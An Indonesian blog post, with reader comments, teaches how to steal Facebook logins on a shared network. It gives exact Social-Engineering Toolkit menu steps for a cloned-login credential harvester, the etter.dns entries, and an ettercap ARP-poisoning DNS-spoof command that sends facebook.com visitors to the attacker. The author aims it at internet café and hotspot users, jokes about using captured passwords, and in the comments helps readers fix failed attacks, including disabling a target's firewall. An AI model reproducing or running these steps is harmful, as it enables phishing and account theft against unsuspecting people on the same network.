Bagaimana Fucklentine kemarin??? Semoga aja agan tidak latah ikut²an orang kampungan merayakannya...
nih hadiah dari saya buat yang merayakan http://dearbrands.com/ hehehe...

kali ini saya akan share tentang SET atau Social-Engineering Toolkit beserta Videonya ( dibawah )..
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....


Pertama buka terminal..

1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..


[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:


berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..

Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)

Tapi sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita ?? lakukan saja DNS SPOOFING...

oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...

1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :

facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3

192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah

ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //

setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :




fullscreen jika kurang jelas...
selamat mencoba :D

46 komentar:

http://farid-complete.blogspot.com mengatakan...

Dicoba dulu..

roni saputra mengatakan...

gan gimana cara nya nih buat buka terminal gak ngerti eng..
heheheh,...

Dabllink mengatakan...

farid : silahkan gan,,,

roni : terminal itu semacam CMD jika di windows..tapi ini d backtrack...silahkan install os linux backtracknya pasti tau,,ini bkn windows tp linux-backtrack :)

freesoft88 mengatakan...

Good job.
thanks for tutorial :c:

Dabllink mengatakan...

sama2 gan :b:

Anonim mengatakan...

tapi klo di coba ke seven blom bisa bro :i: klo xp bisa :)

Dabllink mengatakan...

saya belum coba d seven gan :D
kalo agan dah coba emg ga bisa mungkin ada cara lain...pokonya tetep semgangat :e:

Anonim mengatakan...

gan ane udah coba tp dns spoofnya kayanya ga kerja ane uda coba ke semua kom di rumah... kalo coba langsung browse ke ip : 192.168.1.3 emang keluar tampilan facebook... tp kalo buka www.facebook.com tetep ke situs aslinya...

output ettercap saya :

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> "sensor" 192.168.1.3 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

kenapa yah gan kira2?

Dabllink mengatakan...

itu dns spoofingnya emg dah kerja.. cb d liat d etter.dns nya *.facebook.com A ipagan udah d ketik?? kalo udah, dan d www.facebook.com ga bekerja kemungkinan karena historynya...coba d cek kalo misalkan history d browser korban d bersihin terus masukin www.facebook.com berpengaruh atau ngga... :)

Anonim mengatakan...

mantap gan..ijin belajar ya?..sangat Bermanfaat..Trimakasih Gan

Dabllink mengatakan...

@anonim : sama2 agan :) , semoga bermanfaat..

Your Solution mengatakan...

thanks infonya sob..:)

Dabllink mengatakan...

sama2 agan :)

luka mengatakan...

gan... kalo kaya gini gimana


[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
[*] Looks like the web_server can't bind to 80. Are you running Apache?
[*] Try disabling Apache and try SET again.
[*] Printing error: [Errno 98] Address already in use

[*] Exiting the Social-Engineer Toolkit (SET)... Hack the Gibson.

Dabllink mengatakan...

maaf gan baru bka blog..
itu mungkin karena agan sedang menjalankan apache..
coba disable/stop apachenya..
jalankan perintah /etc/init.d/apache2 stop
setelah itu coba jalankan SET lagi.. :D

Jasonda Lazuardy mengatakan...

Semacam Keylogger ya om ??

Dabllink mengatakan...

ky phising.. :D
tapi alamat yg d aksesnya itu IP kita..cz Backtrack kan ada Apache jd ga perlu daftar hostingan kl buat ky gini..

Dabllink mengatakan...

@gan akhir, sy cb jawab setau saya...
biasanya etter.dns letaknya di
/usr/share/ettercap/etter.dns atau
/usr/local/share/ettercap/etter.dns..agan udah coba d cek dulu? biasanya kalo d locate memang suka ga ada...cek aja nano /usr/share...dst..
kalo ada isinya berarti itu filenya,
di hapus semua jg gpp tulisannya,isi sama perintah spoofing yg kita mau..coba aja dl gan..
kalo emang ga ada jalan lain, instal yg baru aja..tar sy kasih caranya... :)

Muhammad Aidil Amin mengatakan...

[!] Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu.
kenapa ini bro??

Dabllink mengatakan...

cb ketik msfconsole ada metasploitnya ga?

Lai Karomah mengatakan...

asik bray.. :D saya kutip ttg FB-autolikenya

Keep share :D

Dabllink mengatakan...

silahkan gan :)
terimakasih kunjungannya...

Anonim mengatakan...

bang, teknik seperti ini cuma bisa dilakuin di jaringan LAN sama wifi ya ? atau gimana ?? sorry nih newbie

Anonim mengatakan...

gan gmna lok fbx di luar jaringan. g pada 1 jaringan??

Dabllink mengatakan...

ya paling pake phising..soalnya skrg blm ada lg cara..

Anonim mengatakan...

gan pentest/expolits/set/ cd - fungsix apa

kok px ku kagak bs

Dabllink mengatakan...

cd /pentest/exploits/set itu buat ke direktori set yang ada di dir exploit yg ada di dir pentest..
pastikan pengetikannya benar

Unknown mengatakan...

gag ngerti gan

Dabllink mengatakan...

ya belajar

Anonim mengatakan...

gan cara ini,,berfungsi hanya dalam satu jaringan LAN ato gmna??

Dabllink mengatakan...

iya satu jaringan :)

Belajar Menjadi No.1 mengatakan...

keep shared

Dabllink mengatakan...

terimakasih :)

Anonim mengatakan...

gan dns spoofnya gk runing nih knepa ya ? padahal saya udah lakuin seperti yg agan lakukan, tp gk bisa bisa history juga udah di hapus semua
Solusi gan ^^
"Knowledge is free"
"We are Legion"
"Respect us"
"Expect us"

Dabllink mengatakan...

gak running gmn? coba copas outputnya kesini..

nbmnbm5- mengatakan...

gan, mw nya nih pemula bgt soalny, buat tahu interfacesnya kan kita ke ifconfig dulu, itu kita prlu setting IP di network interfacesny ga?

nbmnbm5- mengatakan...

tanya lg gan, kalo backtracknya di vmware, yg di setting apa aja y gan klo sy pk w7 yg jd targetny nya? :)

Dabllink mengatakan...

@nurcahya : kalo udah konek ga usah d setting lagi..tinggal liat aja di ifconfig, terus coba ping ip target jika ada reply berarti sudah terkoneksi jika tidak konek cek firewall target coba offkan dl lalu ping lagi, jika sudah ada reply silahkan exploitasi..semoga berhasil :)

Anonim mengatakan...

gan...pas masukin ip address ke tiny url..ko waktu dijalanin problem loading page y gan...knp kira"?rimakasih

Dabllink mengatakan...

kalo ga ke tinyurl gmn?? sukses ga ?

Anonim mengatakan...

mantap bro,,,,,

sekali coba langsung duoooooooor ,,,,,
i love backtrack :D

Anonim mengatakan...

bro kalo pake koneksi modem usb gmn bro interface , ?? apakah sama mas bro

Dabllink mengatakan...

kalo ip modemnya private ga bisa menurut saya..kl public blm coba..

Deni Setiawan Putra mengatakan...

lanjutkan . sip :)

Anonim mengatakan...

Activating dns_spoof plugin...

SEND L3 ERROR: 1652 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1898 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1688 byte packet (0800:06) destined to 192.168.66.108 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1645 byte packet (0800:06) destined to 192.168.66.102 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1504 byte packet (0800:06) destined to 192.168.66.102 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)

kalo seperti ini apa yg salah gan?

Unknown mengatakan...

:~/sslstrip-0.9# echo ’1′ > /proc/sys/net/ipv4/ip_forward
bash: echo: write error: Invalid argument
kok punya w gini ea

Posting Komentar

:)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* : 8-} ~x( :-t b-( :-L x( =))

Copyright 2010 Blog Iseng
Suported by : Indonesia lost-c0de™ > ID-10t